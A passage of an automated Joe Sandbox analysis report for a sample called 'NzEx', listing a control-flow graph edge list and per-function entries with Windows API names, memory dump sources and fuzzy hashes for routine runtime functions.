355->342 357->353 364 7ff73ae8015b-7ff73ae8016a 358->364 365 7ff73ae801c5 358->365 363 7ff73ae801d5-7ff73ae80201 359->363 392 7ff73ae80035-7ff73ae80041 360->392 393 7ff73ae80002-7ff73ae8002d 360->393 361->360 377 7ff73ae7ff11-7ff73ae7ff24 361->377 371 7ff73ae80203-7ff73ae80213 363->371 372 7ff73ae8022f-7ff73ae80238 363->372 364->365 368 7ff73ae8016c-7ff73ae80188 364->368 369 7ff73ae801cd-7ff73ae801d1 365->369 368->365 376 7ff73ae8018a-7ff73ae801c3 368->376 369->363 371->354 378 7ff73ae80219-7ff73ae80229 371->378 373 7ff73ae8024c-7ff73ae802a0 call 7ff73ae7f250 call 7ff73ae7f2a0 372->373 374 7ff73ae8023a-7ff73ae80247 call 7ff73ae70950 372->374 396 7ff73ae803b6-7ff73ae803c3 call 7ff73ae7f2f0 373->396 397 7ff73ae802a6-7ff73ae802b5 373->397 374->373 376->369 382 7ff73ae7ff3b-7ff73ae7ff47 377->382 383 7ff73ae7ff26-7ff73ae7ff39 377->383 378->354 378->372 384 7ff73ae7ff4f-7ff73ae7ff73 call 7ff73ae70a70 382->384 383->382 383->384 394 7ff73ae80467-7ff73ae8046e 384->394 392->394 393->392 402 7ff73ae803c8-7ff73ae803d3 396->402 398 7ff73ae802fd-7ff73ae80302 397->398 399 7ff73ae802b7-7ff73ae802f8 call 7ff73ae9e9c0 397->399 403 7ff73ae8037d-7ff73ae80381 398->403 404 7ff73ae80304-7ff73ae80313 398->404 415 7ff73ae803b1 399->415 408 7ff73ae803e0-7ff73ae803e8 402->408 409 7ff73ae803db call 7ff73ae7f120 402->409 405 7ff73ae80396-7ff73ae803ac call 7ff73aeb2fe0 403->405 406 7ff73ae80383-7ff73ae80394 call 7ff73ae91a40 403->406 404->403 410 7ff73ae80315-7ff73ae80331 404->410 405->415 406->415 408->335 412 7ff73ae803ee-7ff73ae8040e 408->412 409->408 410->403 411 7ff73ae80333-7ff73ae8037b call 7ff73ae9e9c0 410->411 411->415 417 7ff73ae80465 412->417 418 7ff73ae80410-7ff73ae80415 412->418 417->394 421 7ff73ae80458-7ff73ae80460 call 7ff73ae78660 418->421 422 7ff73ae80417-7ff73ae80454 418->422 421->417 422->421
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $
                                                      • API String ID: 0-227171996
                                                      • Opcode ID: 9843a88858d80629a5392dfe685009a7de1f426911982b70ac98bb5915318121
                                                      • Instruction ID: d5bd067277a0236e4242063ccb3a1c5b9e38533d78aac4219351f94fcad668c6
                                                      • Opcode Fuzzy Hash: 9843a88858d80629a5392dfe685009a7de1f426911982b70ac98bb5915318121
                                                      • Instruction Fuzzy Hash: 50021336618BC585DA70AB29D48122EB3A0F7C9BB4F504772EAAD877E5CF3DD4409B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE730A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 128COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID: \
                                                      • API String ID: 1452528299-2967466578
                                                      • Opcode ID: dc7aa63d98f7a6b8676f16d7f75754d7e493f1b49019153a7c34ee2b34105215
                                                      • Instruction ID: f51fa255296b4c583f5fd3cd4037194275a5e1eb08ab24572c78733b109850af
                                                      • Opcode Fuzzy Hash: dc7aa63d98f7a6b8676f16d7f75754d7e493f1b49019153a7c34ee2b34105215
                                                      • Instruction Fuzzy Hash: 8E512136618B8696EA50EB1DE442229B7F0F788BA4F500275EBAD877A4CF3DD441DF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF2AD1C Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
                                                      • Instruction ID: da3eefcf22401bed6526ec215c6c640c1fe4199cbaf37b961d22d4ae52e78467
                                                      • Opcode Fuzzy Hash: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
                                                      • Instruction Fuzzy Hash: D5E01A2CF4420B62FB147B61988627A6252AF85B42F8496B9C80E023A2CD3DF448A224
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE88BB0 Relevance: 3.8, APIs: 3, Instructions: 21memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$AllocVirtual
                                                      • String ID:
                                                      • API String ID: 1225938287-0
                                                      • Opcode ID: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                      • Instruction ID: a96a77b8ff19dc4ff0acbf4df722c0df5223fb0e2cc531522bc8a6921255c2c7
                                                      • Opcode Fuzzy Hash: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                      • Instruction Fuzzy Hash: 6CF03675519B8192E730BB14F44571AB7A0F7887F4F400364EA9D02BE8CF3CD1448B14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE88C20 Relevance: 3.8, APIs: 3, Instructions: 21memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$AllocVirtual
                                                      • String ID:
                                                      • API String ID: 1225938287-0
                                                      • Opcode ID: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                      • Instruction ID: 9769e2916235078e1bf0e2fb594b68eb30341ace260dad65d4ec2e6534c75529
                                                      • Opcode Fuzzy Hash: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                      • Instruction Fuzzy Hash: 96F01D76529B8196E720BB14E44571AB7A0FB887E4F400364EAED02BE8CF3CD2449B14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE7B7A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128stringCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: strrchr
                                                      • String ID:
                                                      • API String ID: 3418686817-3916222277
                                                      • Opcode ID: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                      • Instruction ID: 236c7ac36e215396b8cca1ae0c1eec89af6349155cb313b0e40c5edc045e96a1
                                                      • Opcode Fuzzy Hash: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                      • Instruction Fuzzy Hash: 5C51CA3661968586E750DB19E08132AF7B0F7C9B94F505166FB9E87B68CF3DD4409F00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF46500 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: Info
                                                      • String ID:
                                                      • API String ID: 1807457897-3916222277
                                                      • Opcode ID: d6049e12829b25a40106f2a2772facc37ef588d00b3e3406152c56e8e443654b
                                                      • Instruction ID: c9d57af774e0c6f7c90b39559145b361ffa27d9c8ac3b47e8795cca7bce6252f
                                                      • Opcode Fuzzy Hash: d6049e12829b25a40106f2a2772facc37ef588d00b3e3406152c56e8e443654b
                                                      • Instruction Fuzzy Hash: 4B51583291C2D296F760DF24D0457AEBBA0F748B48F944175EA8D4BA89CF7CD405DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE65D60 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _wcsupr_s
                                                      • String ID: arg
                                                      • API String ID: 600324503-2022414218
                                                      • Opcode ID: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                      • Instruction ID: e580d733499afefd4970bcf090fdb19dcebea5773c6e1d8d80b82472dc296934
                                                      • Opcode Fuzzy Hash: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                      • Instruction Fuzzy Hash: B5314F3964864196E620FB29E44326AB3A0FBC9794F900671FA9D877B9DF3CD9019F10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF39550 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: try_get_function
                                                      • String ID: AppPolicyGetProcessTerminationMethod
                                                      • API String ID: 2742660187-2031265017
                                                      • Opcode ID: 4833c0902515f3c114d76ba3d1c7fa11a93093573dd0661da56e0bda8c04332a
                                                      • Instruction ID: d6934a13ad7e3ba4c3c31fdf9a4c35956d4a486507dc87c1229c7d999385ecc6
                                                      • Opcode Fuzzy Hash: 4833c0902515f3c114d76ba3d1c7fa11a93093573dd0661da56e0bda8c04332a
                                                      • Instruction Fuzzy Hash: 18E04FDAE09607B1FF046791A8561B492119F18370EC843B1DA3D063E09E3CEADA9260
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF469D8 Relevance: 3.2, APIs: 2, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF73AF463F0: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF73AF46714,?,?,?,?,00000000,COMSPEC,?,00007FF73AF469AE), ref: 00007FF73AF4641A
                                                      • IsValidCodePage.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF73AF467C7,?,?,?,?,00000000,COMSPEC,?,00007FF73AF469AE), ref: 00007FF73AF46A43
                                                      • GetCPInfo.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF73AF467C7,?,?,?,?,00000000,COMSPEC,?,00007FF73AF469AE), ref: 00007FF73AF46A8F
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: CodeInfoPageValid
                                                      • String ID:
                                                      • API String ID: 546120528-0
                                                      • Opcode ID: 8c69a90c0386b87ed3e1871073eaed1069123791459b7e64fa7c6bddaab46548
                                                      • Instruction ID: 9a7b59df6963fac867f12ae9f2a37fd1a599484739330f99e852f540f5cfdcd5
                                                      • Opcode Fuzzy Hash: 8c69a90c0386b87ed3e1871073eaed1069123791459b7e64fa7c6bddaab46548
                                                      • Instruction Fuzzy Hash: FB81F66AE0C69366F7A5BF25D842979F7A1EB40780FC440B6D68E47290DE3DE941F320
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF2B120 Relevance: 3.2, APIs: 2, Instructions: 175COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 23f93f3439cf481d68ace413158a8b6a052188d27ba90543d8d527b73a2b783b
                                                      • Instruction ID: 7199a99743339901a56eaaa36e85ab242f497af94c8818dbf0e01c3fdf57defd
                                                      • Opcode Fuzzy Hash: 23f93f3439cf481d68ace413158a8b6a052188d27ba90543d8d527b73a2b783b
                                                      • Instruction Fuzzy Hash: 0D51E72DB0968B65F738BE26940267AE691FF44BA4F844370DD6C477D5CE3CE441A720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF46D20 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,00000001,00007FF73AF360FF,?,?,COMSPEC,00007FF73AF365F2), ref: 00007FF73AF46D39
                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00000001,00007FF73AF360FF,?,?,COMSPEC,00007FF73AF365F2), ref: 00007FF73AF46DFD
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentStrings$Free
                                                      • String ID:
                                                      • API String ID: 3328510275-0
                                                      • Opcode ID: 3b739908b9269eaa44c28a8684affe23f73ea61920cba442614b266aa52dffe1
                                                      • Instruction ID: 54895f38e4e4a1fdb38bc1b0919706ff83066f9f613b749c40d51c1a0c98907f
                                                      • Opcode Fuzzy Hash: 3b739908b9269eaa44c28a8684affe23f73ea61920cba442614b266aa52dffe1
                                                      • Instruction Fuzzy Hash: 1821A535F08BA391F664AF16A441529E7A4BF44BD0F884274EE8D63BD8DF3CE4529314
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF0D400 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                      • String ID:
                                                      • API String ID: 3548387204-0
                                                      • Opcode ID: 62e22788655639b8fc294ace6df2bf72dda36c5940e2cb69f5321f03f315bef0
                                                      • Instruction ID: ac148861a5f08781d2f040b7ae80b0d7a44d7b1a3c74e3bb9bec24a5fbd7f805
                                                      • Opcode Fuzzy Hash: 62e22788655639b8fc294ace6df2bf72dda36c5940e2cb69f5321f03f315bef0
                                                      • Instruction Fuzzy Hash: 1B11641CE0820762FB68B7B548572BDC2814F91344FD00AB0E98D9A2C3EE1DF885A233
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF3D5D8 Relevance: 3.1, APIs: 2, Instructions: 55COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF73AF3D50B,?,?,00000000,00007FF73AF3D5B3,?,?,?,?,?,?,00007FF73AF2AF6A), ref: 00007FF73AF3D63E
                                                      • GetLastError.KERNEL32(?,?,?,00007FF73AF3D50B,?,?,00000000,00007FF73AF3D5B3,?,?,?,?,?,?,00007FF73AF2AF6A), ref: 00007FF73AF3D648
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseErrorFindLastNotification
                                                      • String ID:
                                                      • API String ID: 1687624791-0
                                                      • Opcode ID: 342de704302773eeb4f8a3e9181b51dc3d1ebcbc1097d58ab930e3d4315a225c
                                                      • Instruction ID: 3dd42e8f82318a65cfd41265b50a29ebf631b0f80f1e3779ebab27bd820a7f5a
                                                      • Opcode Fuzzy Hash: 342de704302773eeb4f8a3e9181b51dc3d1ebcbc1097d58ab930e3d4315a225c
                                                      • Instruction Fuzzy Hash: 6B11D369F0968362FF947736949327DD3825F407A4FC407B4DA3E472D2CE6DE444A221
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AEEF080 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
